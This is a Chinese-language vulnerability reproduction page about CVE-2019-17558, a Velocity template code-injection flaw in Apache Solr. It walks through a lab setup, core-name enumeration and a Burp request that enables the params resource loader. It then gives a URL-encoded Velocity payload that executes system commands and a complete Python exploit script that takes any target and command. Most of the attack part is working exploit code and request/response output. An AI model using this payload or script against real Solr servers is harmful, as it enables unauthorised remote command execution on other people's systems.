（CVE-2019-17558）Apache_Solr_代码注入漏洞-棉花糖会员站

# （CVE-2019-17558）Apache Solr 代码注入漏洞

一、漏洞简介
————

Apache Solr
5.0.0版本至8.3.1版本中存在代码注入漏洞。攻击者通过未授权访问solr服务器，发送特定的数据包开启paramsresource.loader.enabled，然后get访问接口导致服务器命令执行，命令回显结果在response

二、漏洞影响
————

Apache Solr 5.0.0版本至8.3.1

三、复现过程
————

### 环境搭建

https://www.apache.org/dyn/closer.lua/lucene/solr/7.7.2
https://mirrors.tuna.tsinghua.edu.cn/apache/lucene/solr/7.7.2/solr-7.7.2.zip

#### velocity.solrresource.loader.enabled:true

/opt/solr-7.7.2/example/example-DIH/solr/atom/conf/solrconfig.xml
root@kali:/opt/solr-7.7.2/example/example-DIH/solr/atom/conf# cat solrconfig.xml | grep enable
true
${velocity.solrresource.loader.enabled:false}
${velocity.paramsresource.loader.enabled:false}
[email protected]:/opt/solr-7.7.2/example/example-DIH/solr/atom/conf#

#### 开启dih 示例

./solr -e dih -force
[email protected]:/opt/solr-7.7.2/bin# ./solr -e dih -force
*** [WARN] *** Your open file limit is currently 1024.
It should be set to 65000 to avoid operational disruption.
If you no longer wish to see this warning, set SOLR_ULIMIT_CHECKS to false in your profile or solr.in.sh

Starting up Solr on port 8983 using command:
“/opt/solr-7.7.2/bin/solr” start -p 8983 -s “/opt/solr-7.7.2/example/example-DIH/solr” -force

Waiting up to 180 seconds to see Solr running on port 8983 [\]
Started Solr server on port 8983 (pid=20222). Happy searching!

Solr dih example launched successfully. Direct your Web browser to http://localhost:8983/solr to visit the Solr Admin UI
[email protected]:/opt/solr-7.7.2/bin#

**浏览器访问**

http://10.10.20.166:8983/solr/#/

![](/static/qingy/（CVE-2019-17558）Apache_Solr_代码注入漏洞/img/rId27.jpg)

到此，漏洞环境搭建完成。

### 漏洞复现

用户在打开网站时候，再burpsuite里面会发现一个接口，可以获取所有core
name的名称，方便后续遍历core name，拼接字符串,依次检测漏洞

![](/static/qingy/（CVE-2019-17558）Apache_Solr_代码注入漏洞/img/rId29.jpg)

http://www.0-sec.org:8983/solr/admin/cores?_=1572594549070&indexInfo=false&wt=json

简写为

http://www.0-sec.org:8983/solr/admin/cores?indexInfo=false&wt=json
{
“responseHeader”: {
“status”: 0,
“QTime”: 3
},
“initFailures”: {},
“status”: {
“atom”: {
“name”: “atom”,
“instanceDir”: “/opt/solr-7.7.2/example/example-DIH/solr/atom”,
“dataDir”: “/opt/solr-7.7.2/example/example-DIH/solr/atom/data/”,
“config”: “solrconfig.xml”,
“schema”: “managed-schema”,
“startTime”: “2019-11-01T07:47:08.216Z”,
“uptime”: 107753
},
“db”: {
“name”: “db”,
“instanceDir”: “/opt/solr-7.7.2/example/example-DIH/solr/db”,
“dataDir”: “/opt/solr-7.7.2/example/example-DIH/solr/db/data/”,
“config”: “solrconfig.xml”,
“schema”: “managed-schema”,
“startTime”: “2019-11-01T07:47:09.224Z”,
“uptime”: 106745
},
“mail”: {
“name”: “mail”,
“instanceDir”: “/opt/solr-7.7.2/example/example-DIH/solr/mail”,
“dataDir”: “/opt/solr-7.7.2/example/example-DIH/solr/mail/data/”,
“config”: “solrconfig.xml”,
“schema”: “managed-schema”,
“startTime”: “2019-11-01T07:47:06.695Z”,
“uptime”: 109273
},
“solr”: {
“name”: “solr”,
“instanceDir”: “/opt/solr-7.7.2/example/example-DIH/solr/solr”,
“dataDir”: “/opt/solr-7.7.2/example/example-DIH/solr/solr/data/”,
“config”: “solrconfig.xml”,
“schema”: “managed-schema”,
“startTime”: “2019-11-01T07:47:06.702Z”,
“uptime”: 109267
},
“tika”: {
“name”: “tika”,
“instanceDir”: “/opt/solr-7.7.2/example/example-DIH/solr/tika”,
“dataDir”: “/opt/solr-7.7.2/example/example-DIH/solr/tika/data/”,
“config”: “solrconfig.xml”,
“schema”: “managed-schema”,
“startTime”: “2019-11-01T07:47:03.493Z”,
“uptime”: 112475
}
}
}

**利用Burpsuite 发包 ,开启paramsresource.loader.enabled**

> paramsresource.loader.enabled 默认是false

由于我们修改的atom目录下的配置文件，所以我们只能拿这个存在配置缺陷的接口来攻击

http://www.0-sec.org:8983/solr/atom/config

![](/static/qingy/（CVE-2019-17558）Apache_Solr_代码注入漏洞/img/rId30.jpg)

**BurpSuite request**

POST /solr/atom/config HTTP/1.1
Host: www.0-sec.org:8983
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 259
Connection: close
Upgrade-Insecure-Requests: 1

{
“update-queryresponsewriter”: {
“startup”: “lazy”,
“name”: “velocity”,
“class”: “solr.VelocityResponseWriter”,
“template.base.dir”: “”,
“solrresource.loader.enabled”: “true”,
“paramsresource.loader.enabled”: “true”
}
}

**BurpSuite response**

HTTP/1.1 200 OK
Connection: close
Content-Type: application/json;charset=utf-8
Content-Length: 149

{
“responseHeader”:{
“status”:0,
“QTime”:554},
“WARNING”:”This response format is experimental. It is likely to change in the future.”}

**开启后，直接Get 访问（带入表达式）进行远程代码命令执行**

http://www.0-sec.org:8983/solr/atom/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end

**ssit**

http://www.0-sec.org:8983/solr/atom/select?q=1&&wt=velocity&v.template=custom&v.template.custom=
#set($x=”) #set($rt=$x.class.forName(‘java.lang.Runtime’)) #set($chr=$x.class.forName(‘java.lang.Character’)) #set($str=$x.class.forName(‘java.lang.String’)) #set($ex=$rt.getRuntime().exec(‘id’)) $ex.waitFor() #set($out=$ex.getInputStream()) #foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end

![](/static/qingy/（CVE-2019-17558）Apache_Solr_代码注入漏洞/img/rId31.jpg)

注意到状态码是`400`，`而不是200`，出现`500`的情况可能是异常报错。

### poc

**usage**

> python solr\_rce.py http://www.0-sec.org:8983 command

![](/static/qingy/（CVE-2019-17558）Apache_Solr_代码注入漏洞/img/rId33.jpg)

#coding=utf-8

import requests
import sys
import json

banner = ”’
_ _____ _ _____ _____ ______
/\ | | / ____| | | | __ \ / ____| ____|
/ \ _ __ __ _ ___| |__ ___ | (___ ___ | |_ __ | |__) | | | |__
/ /\ \ | ‘_ \ / _` |/ __| ‘_ \ / _ \ \___ \ / _ \| | ‘__| | _ /| | | __|
/ ____ \| |_) | (_| | (__| | | | __/ ____) | (_) | | | | | \ \| |____| |____
/_/ \_\ .__/ \__,_|\___|_| |_|\___| |_____/ \___/|_|_| |_| \_\\_____|______|
| |
|_|
Apache Solr Velocity模板远程代码执行
2019-10-30 17:30
python By Jas502n
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
”’
print banner

def get_code_name(url):
if url[-1] == ‘/’:
url = url[:-1].split(‘\n’)[0]
else:
url = url.split(‘\n’)[0]

core_url = url + ‘/solr/admin/cores?indexInfo=false&wt=json’
print ‘[+] Querying Core Name: ‘+core_url,’\n’
proxies = {“http”:”http://127.0.0.1:8080″}
try:
# r = requests.get(core_url,proxies=proxies)
r = requests.get(core_url)
if r.status_code == 200 and ‘responseHeader’ in r.content and ‘status’ in r.content:
json_str = json.loads(r.content)
for i in json_str[‘status’]:
core_name_url = url + ‘/solr/’ + i + ‘/config’
print core_name_url
update_queryresponsewriter(core_name_url)
else:
print “No core name exit!”
except:
pass
def update_queryresponsewriter(core_name_url):
headers = {
‘User-Agent’: ‘Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0’,
‘Accept’: ‘text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8’,
‘Accept-Language’: ‘zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3’,
‘Accept-Encoding’: ‘gzip, deflate’,
‘Content-Type’: ‘application/json’,
‘Content-Length’: ‘259’,
‘Connection’: ‘close’
}
payload = ”’
{
“update-queryresponsewriter”: {
“startup”: “lazy”,
“name”: “velocity”,
“class”: “solr.VelocityResponseWriter”,
“template.base.dir”: “”,
“solrresource.loader.enabled”: “true”,
“paramsresource.loader.enabled”: “true”
}
}”’
proxies = {“http”:”http://127.0.0.1:8080″}
r = requests.post(core_name_url,headers=headers,data=payload)
# r = requests.post(core_name_url,headers=headers,data=payload,proxies=proxies)
if r.status_code == 200 and ‘responseHeader’ in r.content:
print “[+] maybe enable Successful!”
exp_url = core_name_url[:-7]
cmd = ‘whoami’
cmd = sys.argv[2]

send_exp(exp_url,cmd)
else:
print “[+] Enable Fail!\n”
def send_exp(exp_url,cmd):
exp_url = exp_url + r”/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27″ + cmd + r”%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end”
proxies = {“http”:”http://127.0.0.1:8080″}
r = requests.get(exp_url)
# r = requests.get(exp_url,proxies=proxies)
if r.status_code == 400 or r.status_code == 500 or r.status_code ==200 and len(r.content) >0:
print “>>> [+] Exp Send Successful! <<<" print "____________________________________________________________" print '\n',exp_url,'\n' print '>>>>>>>\n’,r.content
else:
print “[+] EXP No Send Successful!\n”
if __name__ == ‘__main__’:
if len(sys.argv) != 3:
sys.exit(“\n [+] Usage: python %s http://x.x.x.x:8983 command\n” % sys.argv[0])
else:
# url = “http://192.168.5.86:8983”
url = sys.argv[1]
get_code_name(url)